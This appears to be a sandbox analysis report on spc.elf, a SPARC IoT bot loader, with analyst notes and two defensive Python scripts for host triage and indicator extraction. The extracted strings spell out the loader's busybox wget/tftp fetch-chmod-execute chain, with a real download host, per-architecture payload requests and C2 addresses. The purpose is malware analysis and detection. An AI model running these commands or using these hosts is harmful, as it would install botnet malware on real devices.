Linux Analysis Report
spc.elf

Overview

General Information

Sample name: spc.elf
Analysis ID: 1559717
MD5: 264db8cf89331a2fa5e0f5101d55f77e
SHA1: a565ebfa05ca2058b467dfb02239f855ba1e5c80
SHA256: 8f2b384966ba35c669945237d7d2e7ff1f2d314268adc43743d4fe569a7f997b
Tags: elf, user-abuse_ch

Detection

Score: 48
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

Source: spc.elf ReversingLabs: Detection: 39%
Source: global traffic TCP traffic: 192.168.2.23:45598 -> 85.239.34.134:7685
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42 (logged 3 times)
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134 (logged 8 times)
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43 (logged 3 times)
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202 (logged 2 times)
Note: of the four destinations, only 85.239.34.134:7685 matches the non-standard-port signature, and it is also the one the sample retried most often. 91.189.91.42 and 91.189.91.43 lie in 91.189.88.0/21, a prefix allocated to Canonical (Ubuntu archive and update services), and 109.202.202.202:80 is plain HTTP on a well-known port; those three are more plausibly sandbox-host background traffic than sample C2 and should be confirmed against the PCAP before being used as indicators.
Source: spc.elf String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube)
Source: spc.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube)
Source: spc.elf String found in binary or memory: http://87.120.116.226
Source: spc.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY
Source: spc.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample String containing 'busybox' found: /bin/busybox TSUNAMI
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo
Source: Initial sample String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x/tmp//var//var/run//dev/arm5arm72bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r
Source: Initial sample String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '
Source: Initial sample String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
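Read together, the 'busybox' strings above are the loader's complete staging sequence: copy /bin/busybox to files named retrieve and .t, truncate them with >retrieve / >.t, chmod 777 both, then fill .t either by wget from http://87.120.116.226, by tftp -r ... -l .t -g, or by the echo loader (busybox echo -en '...' >> retrieve, then ./retrieve > .t), execute ./.t, and finally truncate both files again. The host-triage check below is an added example, not part of the report, the sandbox vendor's tooling or the sample; it looks for exactly that residue (retrieve / .t files that are mode 0777, empty, or byte-for-byte copies of busybox). The candidate directory list is an assumption: the sample carries the strings /tmp/, /var/, /var/run/ and /dev/, and Mirai-style loaders use such a list as working directories, but the report does not state that. The fixture in make_demo_tree is constructed for the demonstration.

```python
import hashlib
import os
import stat
import tempfile

# File names the loader strings use for its staging copies of busybox.
ARTIFACT_NAMES = ("retrieve", ".t")

# Assumption (not stated by the report): the "/tmp/", "/var/", "/var/run/",
# "/dev/" strings in the sample are the candidate working directories the
# loader cd's into, as Mirai-style loaders do. Treat this as a starting list.
CANDIDATE_DIRS = ["/tmp", "/var", "/var/run", "/dev"]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(dirs, busybox_path="/bin/busybox"):
    """Report files named 'retrieve' or '.t' in the given directories that look
    like loader residue: mode 0777, an empty file (the loader runs '>retrieve'
    and '>.t' to truncate its copies), or a byte-for-byte copy of busybox.
    Returns [(path, [reason, ...]), ...]; directories that do not exist or
    cannot be read are skipped."""
    busybox_hash = sha256_file(busybox_path) if os.path.isfile(busybox_path) else None
    findings = []
    for d in dirs:
        for name in ARTIFACT_NAMES:
            p = os.path.join(d, name)
            try:
                st = os.lstat(p)  # lstat: do not follow a planted symlink
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if stat.S_IMODE(st.st_mode) == 0o777:
                reasons.append("mode 777")
            if st.st_size == 0:
                reasons.append("truncated placeholder")
            elif busybox_hash and sha256_file(p) == busybox_hash:
                reasons.append("copy of busybox")
            if reasons:
                findings.append((p, reasons))
    return findings


def make_demo_tree():
    """Constructed fixture (not from the report): a fake busybox plus the
    residue one loader run leaves in its working dir -- an empty 0777
    'retrieve' and a 0777 copy of busybox named '.t' -- next to a clean dir."""
    root = tempfile.mkdtemp(prefix="tsunami-triage-")
    busybox = os.path.join(root, "busybox")
    with open(busybox, "wb") as f:
        f.write(b"\x7fELF-fake-busybox")
    work = os.path.join(root, "tmp")
    clean = os.path.join(root, "var")
    os.mkdir(work)
    os.mkdir(clean)
    paths = {"root": root, "busybox": busybox, "work": work, "clean": clean}
    for name in ARTIFACT_NAMES:
        p = os.path.join(work, name)
        with open(p, "wb") as f:
            if name == ".t":
                f.write(b"\x7fELF-fake-busybox")
        os.chmod(p, 0o777)
        paths[name] = p
    return paths


if __name__ == "__main__":
    demo = make_demo_tree()
    for path, reasons in triage([demo["work"], demo["clean"]], busybox_path=demo["busybox"]):
        print(path, ", ".join(reasons))
    # On a real device: triage(CANDIDATE_DIRS)
```

On a real device the call is triage(CANDIDATE_DIRS); the hash comparison is what separates a genuine busybox copy from an unrelated file that merely shares the name, and the empty-file case matters because the loader's last step wipes both staging files, so a clean-looking 0-byte retrieve with mode 0777 is itself the indicator.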
Source: Initial sample Potential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.arm7 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.x86 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mips HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mipsel HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.powerpc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sparc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sh4 HTTP/1.0
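The network lines, the hard-coded http://87.120.116.226 string and the GET /fbot.<arch> requests above are the sample's usable indicators, but the report leaves them spread over many lines. The script below is an added example, not part of the report or the sandbox vendor's tooling: it parses a constructed excerpt of the lines above (copied from this page, trimmed to a few lines) and (1) ranks destinations by C2 likelihood, putting non-standard ports first and then the number of DNS-less connection attempts, (2) joins the IP-literal download host with each per-architecture payload name to give full payload URLs, and (3) decodes the \xNN escape the loader passes to busybox echo -en. Two assumptions: that the payload names and the 87.120.116.226 host belong together (the report shows them in a single string, so this is well supported), and that only IP-literal URLs are download hosts, which deliberately leaves the youtube.ru string out.

```python
import re

# Constructed excerpt of the sandbox report lines on this page (raw string so
# the '\x45...' escape stays literal, exactly as the report prints it).
REPORT = r"""
Source: global traffic TCP traffic: 192.168.2.23:45598 -> 85.239.34.134:7685
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: spc.elf String found in binary or memory: http://87.120.116.226
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
Source: Initial sample Potential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mips HTTP/1.0
"""

IPV4 = r"\d+(?:\.\d+){3}"
TCP_RE = re.compile(r"TCP traffic: (" + IPV4 + r"):\d+ -> (" + IPV4 + r"):(\d+)")
NODNS_RE = re.compile(r"without corresponding DNS query: (" + IPV4 + r")")
URL_RE = re.compile(r"https?://[^\s']+")
IP_URL_RE = re.compile(r"^https?://" + IPV4 + r"$")
FETCH_RE = re.compile(r"GET /(fbot\.([A-Za-z0-9_]+)) HTTP/1\.0")
HEXESC_RE = re.compile(r"'((?:\\x[0-9a-fA-F]{2})+)'")

WELL_KNOWN_PORTS = {80, 443}


def rank_c2_candidates(report):
    """Return [(dst_ip, dst_port, dns_less_attempts), ...] sorted so that the
    most C2-like destination comes first: non-standard port before well-known
    port, then more DNS-less connection attempts before fewer."""
    dests = {}
    for m in TCP_RE.finditer(report):
        dst, port = m.group(2), int(m.group(3))
        dests.setdefault(dst, {"port": port, "attempts": 0})
    for m in NODNS_RE.finditer(report):
        if m.group(1) in dests:
            dests[m.group(1)]["attempts"] += 1

    def key(item):
        ip, info = item
        return (info["port"] in WELL_KNOWN_PORTS, -info["attempts"], ip)

    return [(ip, i["port"], i["attempts"]) for ip, i in sorted(dests.items(), key=key)]


def payload_urls(report):
    """Map each architecture the sample requests to the full payload URL(s),
    built from every IP-literal download host found in the strings."""
    hosts = sorted({u.rstrip("/") for u in URL_RE.findall(report)
                    if IP_URL_RE.match(u.rstrip("/"))})
    urls = {}
    for m in FETCH_RE.finditer(report):
        urls[m.group(2)] = [h + "/" + m.group(1) for h in hosts]
    return urls


def decode_echo_sentinel(report):
    """Decode every single-quoted '\\xNN...' run (the argument the loader gives
    to busybox echo -en) into the bytes it writes."""
    decoded = []
    for m in HEXESC_RE.finditer(report):
        raw = bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", m.group(1)))
        decoded.append(raw.decode("ascii", "replace"))
    return decoded


if __name__ == "__main__":
    for ip, port, attempts in rank_c2_candidates(REPORT):
        print(f"{ip}:{port}  dns-less attempts={attempts}")
    for arch, urls in payload_urls(REPORT).items():
        print(arch, urls)
    print(decode_echo_sentinel(REPORT))
```

Run against the excerpt, the ranking puts 85.239.34.134:7685 first, the per-architecture URLs come out as http://87.120.116.226/fbot.arm5 and http://87.120.116.226/fbot.mips, and the escape sequence decodes to the ASCII marker ECHODONE, the terminator the loader appends after its echo-based upload.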
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal48.linELF@0/0@0/0
Source: /usr/bin/dash (PID: 6222) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6
Source: /usr/bin/dash (PID: 6223) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6
Note: both rm executions belong to /usr/bin/dash (PIDs 6222 and 6223) and target mktemp-style /tmp/tmp.* names, while the sample itself runs as PID 6237 under /usr/bin/qemu-sparc; the "rm" signature is therefore most likely shell clean-up around the run, not behaviour of spc.elf.
Source: /tmp/spc.elf (PID: 6237) Queries kernel information via 'uname'
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/sparc
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spc.elf
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc
Note: the sample is a SPARC binary and was executed through QEMU user-mode emulation (/usr/bin/qemu-sparc, registered via /etc/qemu-binfmt/sparc). The strings in the 0x7ffc32767000 region (the qemu-sparc path, SUDO_USER, PATH, DISPLAY and the other variables) are the emulator process's own argv and environment on the x86_64 analysis host, not content of spc.elf, so they should not be treated as sample strings or indicators.